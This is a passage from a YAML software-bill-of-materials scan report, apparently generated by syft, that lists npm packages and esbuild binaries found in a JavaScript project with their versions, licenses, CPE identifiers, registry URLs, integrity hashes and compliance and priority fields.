resolved: https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz
|
|
integrity: sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 1567b7d3e95e72e5
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: functional-red-black-tree 1.0.1'
|
|
title: functional-red-black-tree 1.0.1
|
|
description: 'Package discovered: functional-red-black-tree 1.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 06c01b9cd08a3446
|
|
name: functional-red-black-tree
|
|
version: 1.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:functional-red-black-tree:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:functional-red-black-tree:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:functional_red_black_tree:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:functional_red_black_tree:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:functional-red-black:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:functional-red-black:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:functional_red_black:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:functional_red_black:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:functional-red:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:functional-red:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:functional_red:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:functional_red:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:functional:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:functional:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/functional-red-black-tree@1.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/functional-red-black-tree/-/functional-red-black-tree-1.0.1.tgz
|
|
integrity: sha512-dsKNQNdj6xA3T+QlADDA7mOSlX0qiMINjn0cgr+eGHGsbSHzTabcIogz2+p/iqP1Xs6EP/sS2SbqH+brGTbq0g==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2d3340f07fdb7b3f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: gaxios 6.7.1'
|
|
title: gaxios 6.7.1
|
|
description: 'Package discovered: gaxios 6.7.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9d900b217a57abee
|
|
name: gaxios
|
|
version: 6.7.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:gaxios:gaxios:6.7.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/gaxios@6.7.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/gaxios/-/gaxios-6.7.1.tgz
|
|
integrity: sha512-LDODD4TMYx7XXdpwxAVRAIAuB0bzv0s+ywFonY46k126qzQHT9ygyoa9tncmOiQmmDrik65UYsEkv3lbfqQ3yQ==
|
|
dependencies:
|
|
extend: ^3.0.2
|
|
https-proxy-agent: ^7.0.1
|
|
is-stream: ^2.0.0
|
|
node-fetch: ^2.6.9
|
|
uuid: ^9.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 88029de581a160cb
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: gcp-metadata 6.1.1'
|
|
title: gcp-metadata 6.1.1
|
|
description: 'Package discovered: gcp-metadata 6.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: aa3886c02ba5c2c5
|
|
name: gcp-metadata
|
|
version: 6.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:gcp-metadata:gcp-metadata:6.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:gcp-metadata:gcp_metadata:6.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:gcp_metadata:gcp-metadata:6.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:gcp_metadata:gcp_metadata:6.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:gcp:gcp-metadata:6.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:gcp:gcp_metadata:6.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/gcp-metadata@6.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-6.1.1.tgz
|
|
integrity: sha512-a4tiq7E0/5fTjxPAaH4jpjkSv/uCaU2p5KC6HVGrvl0cDjA8iBZv4vv1gyzlmK0ZUKqwpOyQMKzZQe3lTit77A==
|
|
dependencies:
|
|
gaxios: ^6.1.1
|
|
google-logging-utils: ^0.0.2
|
|
json-bigint: ^1.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c4a7ba3815d4fc91
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: get-caller-file 2.0.5'
|
|
title: get-caller-file 2.0.5
|
|
description: 'Package discovered: get-caller-file 2.0.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: adc0dd4bf4f30c10
|
|
name: get-caller-file
|
|
version: 2.0.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:get-caller-file:get-caller-file:2.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:get-caller-file:get_caller_file:2.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:get_caller_file:get-caller-file:2.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:get_caller_file:get_caller_file:2.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:get-caller:get-caller-file:2.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:get-caller:get_caller_file:2.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:get_caller:get-caller-file:2.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:get_caller:get_caller_file:2.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:get:get-caller-file:2.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:get:get_caller_file:2.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/get-caller-file@2.0.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz
|
|
integrity: sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: fcd2d596421aca4c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: get-intrinsic 1.3.0'
|
|
title: get-intrinsic 1.3.0
|
|
description: 'Package discovered: get-intrinsic 1.3.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 338eac46e71d483e
|
|
name: get-intrinsic
|
|
version: 1.3.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:get-intrinsic:get-intrinsic:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:get-intrinsic:get_intrinsic:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:get_intrinsic:get-intrinsic:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:get_intrinsic:get_intrinsic:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:get:get-intrinsic:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:get:get_intrinsic:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/get-intrinsic@1.3.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz
|
|
integrity: sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==
|
|
dependencies:
|
|
call-bind-apply-helpers: ^1.0.2
|
|
es-define-property: ^1.0.1
|
|
es-errors: ^1.3.0
|
|
es-object-atoms: ^1.1.1
|
|
function-bind: ^1.1.2
|
|
get-proto: ^1.0.1
|
|
gopd: ^1.2.0
|
|
has-symbols: ^1.1.0
|
|
hasown: ^2.0.2
|
|
math-intrinsics: ^1.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 13f511e3eb23bc5c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: get-proto 1.0.1'
|
|
title: get-proto 1.0.1
|
|
description: 'Package discovered: get-proto 1.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 64572c87855a75b1
|
|
name: get-proto
|
|
version: 1.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:get-proto:get-proto:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:get-proto:get_proto:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:get_proto:get-proto:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:get_proto:get_proto:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:get:get-proto:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:get:get_proto:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/get-proto@1.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz
|
|
integrity: sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==
|
|
dependencies:
|
|
dunder-proto: ^1.0.1
|
|
es-object-atoms: ^1.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9565869711547f61
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/@esbuild/darwin-arm64/bin/esbuild
|
|
startLine: 0
|
|
message: 'Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2'
|
|
title: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2
|
|
description: 'Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0b617a8d86aea060
|
|
name: github.com/evanw/esbuild
|
|
version: v0.0.0-20240609211631-fc37c2fa9de2
|
|
type: go-module
|
|
foundBy: go-module-binary-cataloger
|
|
locations:
|
|
- path: /node_modules/@esbuild/darwin-arm64/bin/esbuild
|
|
accessPath: /node_modules/@esbuild/darwin-arm64/bin/esbuild
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: go
|
|
cpes:
|
|
- cpe: cpe:2.3:a:evanw:esbuild:v0.0.0-20240609211631-fc37c2fa9de2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:golang/github.com/evanw/esbuild@v0.0.0-20240609211631-fc37c2fa9de2
|
|
metadataType: go-module-buildinfo-entry
|
|
metadata:
|
|
goBuildSettings:
|
|
- key: -buildmode
|
|
value: exe
|
|
- key: -compiler
|
|
value: gc
|
|
- key: -trimpath
|
|
value: 'true'
|
|
- key: CGO_ENABLED
|
|
value: '0'
|
|
- key: GOARCH
|
|
value: arm64
|
|
- key: GOOS
|
|
value: darwin
|
|
- key: vcs
|
|
value: git
|
|
- key: vcs.revision
|
|
value: fc37c2fa9de2ad77476a6d4a8f1516196b90187e
|
|
- key: vcs.time
|
|
value: '2024-06-09T21:16:31Z'
|
|
- key: vcs.modified
|
|
value: 'false'
|
|
goCompiledVersion: go1.20.12
|
|
architecture: arm64
|
|
mainModule: github.com/evanw/esbuild
|
|
goCryptoSettings:
|
|
- standard-crypto
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 701c2b7f153ed08a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/esbuild/bin/esbuild
|
|
startLine: 0
|
|
message: 'Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2'
|
|
title: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2
|
|
description: 'Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0dc26b5347e8f4df
|
|
name: github.com/evanw/esbuild
|
|
version: v0.0.0-20240609211631-fc37c2fa9de2
|
|
type: go-module
|
|
foundBy: go-module-binary-cataloger
|
|
locations:
|
|
- path: /node_modules/esbuild/bin/esbuild
|
|
accessPath: /node_modules/esbuild/bin/esbuild
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: go
|
|
cpes:
|
|
- cpe: cpe:2.3:a:evanw:esbuild:v0.0.0-20240609211631-fc37c2fa9de2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:golang/github.com/evanw/esbuild@v0.0.0-20240609211631-fc37c2fa9de2
|
|
metadataType: go-module-buildinfo-entry
|
|
metadata:
|
|
goBuildSettings:
|
|
- key: -buildmode
|
|
value: exe
|
|
- key: -compiler
|
|
value: gc
|
|
- key: -trimpath
|
|
value: 'true'
|
|
- key: CGO_ENABLED
|
|
value: '0'
|
|
- key: GOARCH
|
|
value: arm64
|
|
- key: GOOS
|
|
value: darwin
|
|
- key: vcs
|
|
value: git
|
|
- key: vcs.revision
|
|
value: fc37c2fa9de2ad77476a6d4a8f1516196b90187e
|
|
- key: vcs.time
|
|
value: '2024-06-09T21:16:31Z'
|
|
- key: vcs.modified
|
|
value: 'false'
|
|
goCompiledVersion: go1.20.12
|
|
architecture: arm64
|
|
mainModule: github.com/evanw/esbuild
|
|
goCryptoSettings:
|
|
- standard-crypto
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 0bd7d35ef088b0fd
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: glob 10.5.0'
|
|
title: glob 10.5.0
|
|
description: 'Package discovered: glob 10.5.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 8da722cb9983d6b3
|
|
name: glob
|
|
version: 10.5.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:isaacs:glob:10.5.0:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/glob@10.5.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/glob/-/glob-10.5.0.tgz
|
|
integrity: sha512-DfXN8DfhJ7NH3Oe7cFmu3NCu1wKbkReJ8TorzSAFbSKrlNaQSKfIzqYqVY8zlbs2NLBbWpRiU52GX2PbaBVNkg==
|
|
dependencies:
|
|
foreground-child: ^3.1.0
|
|
jackspeak: ^3.1.2
|
|
minimatch: ^9.0.4
|
|
minipass: ^7.1.2
|
|
package-json-from-dist: ^1.0.0
|
|
path-scurry: ^1.11.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 282a3bcad6a151e3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: glob-parent 5.1.2'
|
|
title: glob-parent 5.1.2
|
|
description: 'Package discovered: glob-parent 5.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e9e84f484cfaf367
|
|
name: glob-parent
|
|
version: 5.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:gulpjs:glob-parent:5.1.2:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/glob-parent@5.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.2.tgz
|
|
integrity: sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow==
|
|
dependencies:
|
|
is-glob: ^4.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4709c0ff6455a8d2
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: glob-parent 6.0.2'
|
|
title: glob-parent 6.0.2
|
|
description: 'Package discovered: glob-parent 6.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 1644b4942c7696f6
|
|
name: glob-parent
|
|
version: 6.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:gulpjs:glob-parent:6.0.2:*:*:*:*:node.js:*:*
